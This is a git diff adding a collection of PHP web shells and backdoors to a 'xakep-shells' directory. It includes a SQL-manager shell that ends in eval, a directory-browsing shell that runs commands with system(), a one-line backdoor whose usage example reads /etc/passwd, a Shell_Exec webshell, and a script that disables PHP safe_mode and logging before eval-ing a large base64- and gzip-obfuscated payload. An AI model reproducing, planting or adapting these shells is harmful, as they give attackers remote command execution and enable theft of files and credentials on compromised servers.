+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($result,$fi).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($result,$fi).'('.mysql_field_len($result,$fi).")</b></td><td>".((mysql_field_len($result,$fi)<40)?"<input type='text' name='ed_key:".mysql_field_name($result,$fi)."' value='".htmlspecialchars($col_value,ENT_QUOTES)."' size=40>":"<textarea name='ed_key:".mysql_field_name($result,$fi)."' cols=31 rows=7>".htmlspecialchars($col_value,ENT_QUOTES)."</textarea>")."</td></tr>\n";
+$fi++;}}
+
+echo "</table></div><input type=submit name=ed_save value=Save>";
+}
+else select();
+
+break;
+
+
+case 7:
+
+//INSERT/UPDATE
+
+$ted='';
+reset($_POST);
+while(list($key,$val)=each($_POST)){
+if(preg_match('/^ed_key:(.+)/',$key,$m)){
+$ted.="`".$m[1]."`= '".addslashes($val)."', ";
+}}
+$ted=substr($ted,0,-2);
+$query=((isset($_POST['insert']))?"INSERT":"UPDATE")." `".$_POST['table_sel']."` SET $ted ".((isset($_POST['insert']))?'':"WHERE ".urldecode($_POST['edit'])." LIMIT 1 ");
+echo "<div style='background-color:white;'>".htmlspecialchars($query,ENT_QUOTES)."</div><br>";
+$result=mysql_query($query,$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
+echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";
+
+
+
+
+break;
+
+case 8:
+//SEARCH;
+
+
+print "<div style='width:100%;height:440px;overflow:auto;'>";
+
+$j=0;
+
+
+function spdb($line){
+global $connect,$j,$sql;
+$fields=mysql_list_fields($_POST['db'], $line, $connect );
+$columns=mysql_num_fields($fields);
+for($i=0;$i<$columns;$i++){
+$nomField=mysql_field_name($fields,$i);
+$sql="SELECT ".$nomField." FROM ".$line." WHERE ".$nomField.' '.$_POST['opts'].(!preg_match('/NULL/',$_POST['opts'])?" ".(!preg_match('/[><]/',$_POST['opts'])?"'":'').addslashes($_POST['seart']).(!preg_match('/[><]/',$_POST['opts'])?"'":''):'').(!empty($_POST['limits'])?' LIMIT '.$_POST['limits']:'');
+$query=mysql_query($sql) or print(mysql_error($connect));
+
+if(mysql_num_rows($query)>0){
+while($result=mysql_fetch_array($query)){
+echo "Table: <b>".$line."</b>&nbsp;&nbsp;Field: <b>".$nomField."</b><br>SQL: <b>".htmlspecialchars($sql)."</b><br><b><div  style='background-color:#71D8C3;'>".htmlspecialchars($result[0])."</div></b>";
+echo "<br><br>";
+$j++;
+}}}}
+
+
+
+
+
+
+if($_POST['locas']==0){
+$tables=mysql_list_tables($_POST['db']);
+while($line=mysql_fetch_row($tables)){
+spdb($line[0]);
+}}
+else{
+spdb($_POST['table_sel']);
+}
+
+
+
+
+
+echo "</div><div style='background-color:#C4DCC7;'>Results: ".$j.'</div>';
+
+
+
+break;
+
+case 9:
+
+
+if(is_uploaded_file($_FILES['upload']['tmp_name'])) {
+$data=load($_FILES['upload']['tmp_name']);
+}
+elseif(!empty($_POST['load'])){
+$data=load($_POST['load']);
+}
+if(isset($data)){
+$arrup=explode(';',$data);
+if(preg_match('/^[ \n\r]?$/',$arrup[count($arrup)-1]))array_splice($arrup,-1);
+foreach($arrup as $aup){
+mysql_query($aup,$connect) or $err=1;
+}
+print(isset($err)?mysql_error($connect):'Query susceful!');
+}
+
+
+
+
+
+
+break;
+
+case 10:
+//DELETE
+if(!isset($_POST['table_sel2']) || $_POST['table_sel']===$_POST['table_sel2']){
+$code='DELETE FROM `'.$_POST['table_sel'].'` WHERE '.urldecode($_POST['edit']).' LIMIT 1';
+isset($_POST['delp'])?mysql_query($code):print("<div style='width:100%;background-color:#A8B8F1;'>".htmlspecialchars($code).'<input type=hidden name=edit value="'.$_POST['edit'].'"><br><input type=submit name=delp value=OK></div>');
+}
+else select();
+
+
+break;
+
+
+
+
+
+
+
+}}
+
+
+
+echo "</td></tr></table></td></tr></table></tr><table><input type=hidden name=sql value=1>\n";
+
+}
+
+else eval($text.";echo \$etext;");
+echo "</form></body></html>";
+exit;
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/shell.php.php.txt b/xakep-shells/PHP/shell.php.php.txt
new file mode 100644
index 0000000..ef13ce8
--- /dev/null
+++ b/xakep-shells/PHP/shell.php.php.txt
@@ -0,0 +1,146 @@
+<?php
+
+define('PHPSHELL_VERSION', '1.7');
+
+?>
+
+<html>
+<head>
+<title> Matamu Mat </title>
+</head>
+<body>
+<hr><br>
+
+<?php
+
+if (ini_get('register_globals') != '1') {
+  /* We'll register the variables as globals: */
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+  /* A workdir has been asked for */
+  if (!empty($command)) {
+    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+      /* We try and match a cd command. */
+      if ($regs[1][0] == '/') {
+        $new_dir = $regs[1]; // 'cd /something/...'
+      } else {
+        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+      }
+      if (file_exists($new_dir) && is_dir($new_dir)) {
+        $work_dir = $new_dir;
+      }
+      unset($command);
+    }
+  }
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+  /* We change directory to that dir: */
+  chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like '/foo/../bar': */
+$work_dir = exec('pwd');
+
+?>
+
+<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+<p>Current working directory: <b>
+<?php
+
+$work_dir_splitted = explode('/', substr($work_dir, 1));
+
+echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('<a href="%s?work_dir=%s">%s</a>/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?></b></p>
+<p>Choose new working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == '.') {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == '..') {
+      /* We have found the parent dir. We must be carefull if the parent 
+	 directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+	/* work_dir is only 1 charecter - it can only be / There's no
+          parent directory then. */
+      } elseif (strrpos($work_dir, '/') == 0) {
+	/* The last / in work_dir were the first charecter.
+	   This means that we have a top-level directory
+	   eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+	 directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == '/') {
+	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+closedir($dir_handle);
+
+?>
+
+</select></p>
+
+<p>Command: <input type="text" name="command" size="60">
+<input name="submit_btn" type="submit" value="Execute Command"></p>
+
+<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
+<textarea cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+  if ($stderr) {
+    $tmpfile = tempnam('/tmp', 'phpshell');
+    $command .= " 1> $tmpfile 2>&1; " .
+    "cat $tmpfile; rm $tmpfile";
+  } else if ($command == 'ls') {
+    /* ls looks much better with ' -F', IMHO. */
+    $command .= ' -F';
+  }
+  system($command);
+}
+?>
+
+</textarea>
+</form>
+
+<script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+</script>
+
+<hr>
+
+</body>
+</html>
diff --git a/xakep-shells/PHP/simple-backdoor.php.txt b/xakep-shells/PHP/simple-backdoor.php.txt
new file mode 100644
index 0000000..bc0e778
--- /dev/null
+++ b/xakep-shells/PHP/simple-backdoor.php.txt
@@ -0,0 +1,17 @@
+<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
+
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
+
+<!--    http://michaeldaw.org   2006    -->
diff --git a/xakep-shells/PHP/simple_cmd.html.txt b/xakep-shells/PHP/simple_cmd.html.txt
new file mode 100644
index 0000000..6416588
--- /dev/null
+++ b/xakep-shells/PHP/simple_cmd.html.txt
@@ -0,0 +1,18 @@
+<html>
+<head>
+<title>G-Security Webshell</title>
+</head>
+
+<body bgcolor=#000000 text=#ffffff ">
+<form method=POST>
+<br>
+<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" 
+style="background:#000000;color:#ffffff;">
+<hr>
+<pre>
+<? $cmd = $_REQUEST["-cmd"];?>
+<? if($cmd != "") print Shell_Exec($cmd);?>
+</pre>
+</form>
+</body>
+</html
diff --git a/xakep-shells/PHP/small.php.php.txt b/xakep-shells/PHP/small.php.php.txt
new file mode 100644
index 0000000..249ec2e
--- /dev/null
+++ b/xakep-shells/PHP/small.php.php.txt
@@ -0,0 +1,23 @@
+<? 
+error_reporting(0);
+
+$language='ru';
+
+$auth = 0;
+
+$name='abcdef1234567890abcdef1234567890'; 
+$pass='abcdef1234567890abcdef1234567890';
+
+@ini_restore("safe_mode");
+@ini_restore("open_basedir");
+@ini_restore("safe_mode_include_dir");
+@ini_restore("safe_mode_exec_dir");
+@ini_restore("disable_functions");
+@ini_restore("allow_url_fopen");
+
+@ini_set('error_log',NULL);
+@ini_set('log_errors',0);
+
+/******************************************************************************************************/
+eval(gzinflate(base64_decode('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